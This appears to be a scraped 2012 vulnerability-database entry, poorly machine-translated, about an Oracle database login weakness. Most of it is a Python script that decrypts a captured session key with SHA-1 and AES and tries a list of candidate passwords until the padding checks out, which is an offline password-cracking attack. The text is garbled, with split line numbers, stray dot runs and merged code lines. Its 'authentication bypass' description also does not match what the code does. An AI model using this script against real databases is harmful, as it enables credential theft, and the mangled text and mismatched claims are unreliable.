Oracle database to bypass login authentication-vulnerability warning-the black bar safety net

2012-10-25T00:00:00
ID MYHACK58:62201235299
Type myhack58
Reporter 佚名
Modified 2012-10-25T00:00:00

Description

And a while back that phpmyadmin to bypass the verification is somewhat similar.

An attacker can exploit this vulnerability to bypass authentication process and gain unauthorized access to the database.

  1. --coding:utf8 --

  2. import hashlib
  3. from Crypto. Cipher import AES
  4. def decrypt(session,salt,password):
  5. pass_hash = hashlib. sha1(password+salt)

......... ..... ..... .......... .. 2 4 ....

1 0. key = pass_hash. digest() + '\x00\x00\x00\x00' 1 1. decryptor = AES. new(key,AES. MODE_CBC) 1 2. plain = decryptor. the decrypt(session) 1 3. return plain 1 4. 1 5.

............. ........... ...... 4 8 ....

1 6. session_hex = 'EA2043CB8B46E3864311C68BDC161F8CA170363C1E6F57F3EBC6435F541A8239B6DBA16EAAB5422553A7598143E78767' 1 7. 1 8.

.... 1 0 ....

1 9. salt_hex = 'A7193E546377EC56639E' 2 0. 2 1. passwords = ['test','password','oracle','demo'] 2 2. 2 3. for password in passwords: 2 4. session_id = decrypt(session_hex. decode('hex'),salt_hex. decode('hex'),password) 2 5. print 'Decrypted session_id for password "%s" is %s' % (password,session_id. encode('hex')) 2 6. if session_id[4 0:] == '\x08\x08\x08\x08\x08\x08\x08\x08': 2 7. print 'PASSWORD IS "%s"' % password 2 8. break

[1] [2] next